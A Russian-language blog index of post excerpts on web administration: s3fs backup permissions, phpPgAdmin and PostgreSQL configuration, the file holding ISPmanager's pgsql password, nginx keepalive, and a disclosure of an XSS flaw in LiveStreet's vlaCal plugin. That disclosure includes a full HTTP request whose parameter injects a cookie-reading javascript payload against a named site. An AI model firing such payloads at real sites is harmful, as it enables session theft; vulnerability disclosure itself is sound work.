Любимое дело. Обретение.

Знакомо ли вам чувство, что вы тратите свое время зря, просиживая часы на нелюбимой работе?

Вы устаете, вам приходится вставать в не очень хорошем настроении (ведь снова на работу), вы находитесь в ожидании конца рабочего дня, выходных, зарплаты и отпуска.

Но вы при этом хотите быть счастливым, помогать людям, заниматься тем, что будет вам по душе. Глубоко вы точно знаете, что можете дать себе и этому миру нечто большее.

У вас есть хобби?
Читать дальше

Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории

LiveStreet XSS
Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1

Фаил: decade.php
POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: blog.himic.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22

Читать дальше

Бэкапы на Amazon s3fs права доступа при подключении диска

К примеру в статье habrahabr.ru/post/111555/ используется строчка подключения диска
s3fs your-bucket-name /mnt/backup -o allow_other,retries=10,connect_timeout=30,readwrite_timeo


Если примонтировать S3 под root то к разделу /mnt/backup будут иметь доступ пользователи сервера в том числе и через PHP скрипты(или запущенные шеллы Perl, C).

Таким образом пользователи или какой-нибудь сайт на WordPress может послужить огромной опасностью.

Правильно:
Параметр Если без параметра allow_other примонтировать S3 диск, то доступ к диску будет возможен только тому пользователю кто его примонтировал.

Соответственно и бекапы надо делать под пользователем под которым подключили диск.
У меня OS Debian 5 + ISPmanager

Проверьте пожалуйста и у вас доступен ли каталог Amazon для простых пользователей.
А то получается что простые пользователи могут уничтожить все бекапы и вы останетесь без них.

PS:
При присутствующем параметре allow_other — установка UNIX прав 0600 на фаилы и каталоги не действуют.
Монтирование диска с параметрами RW, UID=, GID= тоже недействуют.
s3fs your-bucket-name /mnt/backup -o retries=10,connect_timeout=30,readwrite_timeout=30,uid=0,gid=0


PS:
данная ошибка будет возникать если вы пытаетесь примонтировать диск не под пользователем которому разрешено читать /etc/passwd-s3fs
s3fs: could not determine how to establish security credentials
Читать дальше

Реализация инструментов для создания контента OVAL на Python

Open Vulnerability and Assessment Language
Данный модуль позволяет выполнять сборку секьюрити-контента и «упаковку» его в базу данных с контролем версий и уникальности идентификаторов.

В процессе исследования языка OVAL, про который написано ранее в одной из статей, и концепции SCAP-сканера мы столкнулись с довольно серьезной проблемой, а именно с отсутствием удобных инструментов для создания контента на языке OVAL. Нет, мы не утверждаем, что нет совсем ничего. Есть небольшой набор утилит, представленных на официальном сайте. Большая часть из них платная, остальные же представляют собой не очень удобные решения, больше всего похожие на XML-Notepad. В итоге мы решили создать небольшой необходимый для работы инструмент самостоятельно, используя в качестве языка Python
Читать дальше

Error Loading database.php postgres

Error Loading database.php postgres

Attempt to connect with invalid server parameter, possibly someone is trying to hack your system.

phpPgAdmin
посмотрите в config.inc.php параметр:
$conf['servers'][0]['host'] = 'localhost';

и замените его на
$conf['servers'][0]['host'] = '';


именно замените, а НЕ добавьте во так:
#$conf['servers'][0]['host'] = 'localhost';
$conf['servers'][0]['host'] = '';

т.е. одна строка закоменчена, а другая нет.
Закоменченная строка почемуто не считается закоменченой и phpPgAdmin её применяет. Видимо он парсит этот фаил на переменную.
Читать дальше

PostgreSQL : Изменение кодировки по-умолчанию для новых таблиц на UTF-8

Password:
createdb: database creation failed: ERROR:  new encoding (UTF8) is incompatible with the encoding of the template database (SQL_ASCII)
HINT:  Use the same encoding as in the template database, or use template0 as template.


Когда мы создаем новую базу данных, PostgreSQL фактически просто создает копию имеющегося шаблона базы данных.

Изначально существует два шаблона: template0 и template1. Шаблон template1 используется по-умолчанию при создании новых баз данных. Чтобы изменить кодировку вновь создаваемой базы данных одним из путей является изменение шаблона template1. Чтобы сделать это, подключитесь к командной оболочке PostgresSQL (psql) и выполните следующие действия:

1. В первую очередь необходимо удалить template1. Шаблоны не могут быть удалены, поэтому сначала мы изменим его, как-будто это обычная база данных:
UPDATE pg_database SET datistemplate = FALSE WHERE datname = 'template1';


2. Теперь мы можем удалить его:
DROP DATABASE template1;


3. Следующий шаг – создание новой базы данных из шаблона template0, с новой кодировкой по-умолчанию:
CREATE DATABASE template1 WITH TEMPLATE = template0 ENCODING = 'UNICODE';


4. Теперь изменим базу данных template1 чтобы она стала шаблоном:
UPDATE pg_database SET datistemplate = TRUE WHERE datname = 'template1';


6. (К сведению) Если Вы не хотите, чтобы кто-либо пользовался этим шаблоном, установите значение datallowconn в FALSE:
UPDATE pg_database SET datallowconn = FALSE WHERE datname = 'template1';


Теперь Вы можете создавать новые базы в кодировке UTF8.

Автор: websiteprojector.ru/?p=151
Читать дальше

ISPmanager установка PostgreSQL - пароль пользователя pgsql

После установки PostgreSQL из панели управления ISPmanager, мы незнаем где искать пароль.

Пароль от пользователя pgsql лежит в /usr/local/ispmgr/etc/ispmgr.conf

DbServer "PostgreSQL" {
    Owner __Owner__
    AccessType allow
    ChangePassword 2012-03-01
    Hostname localhost
    Password you_password
    SockPath /var/run/postgresql
    Type pgsql
    User postgres
}
Читать дальше

Nginx keepalive_timeout 0; зло?

После установки keepalive_timeout 0; этого значения, картинки как большие так и болеее менее 600 кб штука стали отдаваться с 503 ошибкой.

www.webpagetest.org/result/120227_C5_3CKR8/1/details/ результаты тестов.
Картинки с UWDC отдавались по 3-4 штуки, остальные с 503 ошибкой, за что стыдно.

www.webpagetest.org/result/120227_44_3CMBF/ тесты с keepalive_timeout 65;
Пусть он и закрывает порт после отдачи, но он может закрывать порт и неотдав ничего в замен. Что вызывало 503.
Читать дальше